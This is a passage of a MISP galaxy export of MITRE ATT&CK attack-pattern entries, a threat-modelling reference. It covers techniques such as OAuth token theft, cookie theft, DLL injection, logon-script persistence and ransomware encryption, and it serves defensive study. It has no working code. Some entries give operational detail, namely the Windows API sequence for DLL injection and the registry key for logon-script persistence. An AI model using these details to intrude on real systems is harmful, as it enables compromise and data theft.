This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).

A technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)
The tag is: `misp-galaxy:mitre-attack-pattern="Use multiple DNS infrastructures - T1327"

Table 3136. Table References

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**Analyze application security posture - T1293**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).

An adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)

The tag is: `misp-galaxy:mitre-attack-pattern="Analyze application security posture - T1293"

Table 3137. Table References

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**Malicious Software Development Tools - T1462**

As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.

Detection: Enterprises could deploy integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.

Platforms: Android, iOS

The tag is: `misp-galaxy:mitre-attack-pattern="Malicious Software Development Tools - T1462"

Malicious Software Development Tools - T1462 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 3138. Table References

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Identify technology usage patterns - T1264

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).

Technology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify technology usage patterns - T1264"`

Table 3139. Table References

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Generate Fraudulent Advertising Revenue - T1472

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

The tag is: `misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472"

Table 3140. Table References

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Identify sensitive personnel information - T1274

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1274).

An adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify sensitive personnel information - T1274"

Table 3141. Table References

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1327
Identify web defensive services - T1256

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).

An adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify web defensive services - T1256"

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Steal Application Access Token - T1528

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS). (Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow. (Citation: Microsoft Identity Platform Protocols May 2019) (Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls. (Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001). (Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users. (Citation: 1328)
Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528"

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Gather Victim Host Information - T1592

Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592"

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<td><a href="https://attack.mitre.org/techniques/T1592">https://attack.mitre.org/techniques/T1592</a></td>
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</table>
Identify people of interest - T1269

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).

The attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify people of interest - T1269"`

Table 3145. Table References

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Data from Local System - T1533

Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system.

Local system data includes information stored by the operating system. Access to local system data often requires escalated privileges (e.g. root access). Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos.

The tag is: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"

Table 3146. Table References

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Post compromise tool development - T1353

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1353).

After compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)

The tag is: `misp-galaxy:mitre-attack-pattern="Post compromise tool development - T1353"`
### Standard Application Layer Protocol - T1437

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic.

In the mobile environment, the Google Cloud Messaging (GCM; two-way) and Apple Push Notification Service (APNS; one-way server-to-device) are commonly used protocols on Android and iOS respectively that would blend in with routine device traffic and are difficult for enterprises to inspect. Google reportedly responds to reports of abuse by blocking access to GCM. (Citation: Kaspersky-MobileMalware)

The tag is: `misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437"`

### Build or acquire exploits - T1349

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)

The tag is: `misp-galaxy:mitre-attack-pattern="Build or acquire exploits - T1349"`

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**Table 3147. Table References**

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Create infected removable media - T1355

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).

Use of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)

The tag is: *misp-galaxy:mitre-attack-pattern*="Create infected removable media - T1355"

**Table 3150. Table References**

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Remote Service Session Hijacking - T1563

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)

The tag is: *misp-galaxy:mitre-attack-pattern*="Remote Service Session Hijacking - T1563"

**Table 3151. Table References**

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<td><a href="https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6">https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6</a></td>
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<td><a href="https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident">https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident</a></td>
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Steal Web Session Cookie - T1539

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to
remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypass some multi-factor authentication protocols. (Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system. (Citation: Kaspersky TajMahal April 2019) (Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns. (Citation: Github evilginx2) (Citation: GitHub Muraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

The tag is: `misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539"`

### Table 3152. Table References

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<td><a href="https://securelist.com/project-tajmahal/90240/">https://securelist.com/project-tajmahal/90240/</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/">https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/</a></td>
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## Targeted social media phishing - T1366

This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).

Sending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)

The tag is: `misp-galaxy:mitre-attack-pattern="Targeted social media phishing - T1366"

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## Modify Trusted Execution Environment - T1399

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device’s Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and
may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior. (Citation: Roth-Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Trusted Execution Environment - T1399"

Table 3154. Table References

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Masquerade as Legitimate Application - T1444

An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.

Embedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it. (Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.

Pretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description. (Citation: Palo Alto HenBox)

Malicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"

Table 3155. Table References

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</table>
Compromise Client Software Binary - T1554

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554"

Table 3156. Table References

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Abuse Elevation Control Mechanism - T1548

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548"

Table 3157. Table References

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Downgrade to Insecure Protocols - T1466

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466"

Table 3158. Table References

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Rogue Cellular Base Station - T1467

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique (Citation: Computerworld-Femtocell).

The tag is: *misp-galaxy:mitre-attack-pattern=*"Rogue Cellular Base Station - T1467"

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Data Encrypted for Impact - T1486

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002). (Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)

In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)

The tag is: *misp-galaxy:mitre-attack-pattern=*"Data Encrypted for Impact - T1486"

**Table 3159. Table References**

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**Table 3160. Table References**

1336
Exploit via Radio Interfaces - T1477

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

Baseband Vulnerability Exploitation

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi (Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device (Citation: Register-BaseStation) (Citation: Weinmann-Baseband).

Malicious SMS Message

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device (Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages (Citation: SRLabs-SIMCard).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477"

Table 3161. Table References

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<td><a href="https://srlabs.de/bites/rooting-sim-cards/">https://srlabs.de/bites/rooting-sim-cards/</a></td>
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Network Denial of Service - T1498

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the
network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes (Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction (Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion. (Citation: Symantec DDoS October 2014)

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).

The tag is: **misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"**

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**Endpoint Denial of Service - T1499**

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes (Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction (Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion. (Citation:
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: `misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499"`

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Credentials from Password Stores - T1555

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: `misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"`

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Exfiltration Over Web Service - T1567

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: `misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567"`

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Search Open Technical Databases - T1596

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans. (Citation: WHOIS) (Citation: DNS Dumpster) (Citation: Circl Passive DNS) (Citation: Medium SSL Cert) (Citation: SSLShopper Lookup) (Citation: DigitalShadows CDN) (Citation: Shodan)

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: *misp-galaxy:mitre-attack-pattern=“Search Open Technical Databases - T1596”*

Table 3166. Table References

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<td><a href="https://shodan.io">https://shodan.io</a></td>
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Modify Cloud Compute Infrastructure - T1578

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence. (Citation: Mandiant M-Trends 2020)
Gather Victim Identity Information - T1589

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: *misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589"*
SNMP (MIB Dump) - T1602.001

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001"

Table 3169. Table References

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Logon Script (Windows) - T1037.001

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001"

Table 3170. Table References
Logon Script (Mac) - T1037.002

Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user. (Citation: creating login hook)

Adversaries may use these login hooks to maintain persistence on a single system. (Citation: S1 macOS Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary.

The tag is: `misp-galaxy:mitre-attack-pattern="Logon Script (Mac) - T1037.002"`

Table 3171. Table References

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Push-notification client-side exploit - T1373

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)

The tag is: `misp-galaxy:mitre-attack-pattern="Push-notification client-side exploit - T1373"

Table 3172. Table References

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Dynamic-link Library Injection - T1055.001

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based
defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as `<code>VirtualAllocEx</code>` and `<code>WriteProcessMemory</code>`, then invoked with `<code>CreateRemoteThread</code>` (which calls the `<code>LoadLibrary</code>` API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of `<code>LoadLibrary</code>`). (Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"`

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### Exploit Public-Facing Application - T1190

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access
management policies.

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities. (Citation: OWASP Top 10)(Citation: CWE top 25)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190"

Table 3174. Table References

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Untargeted client-side exploitation - T1370

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Untargeted client-side exploitation - T1370"

Table 3175. Table References

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<td><a href="https://attack.mitre.org/techniques/T1370">https://attack.mitre.org/techniques/T1370</a></td>
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Non-Application Layer Protocol - T1095

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example. (Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"

Table 3176. Table References

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Two-Factor Authentication Interception - T1111

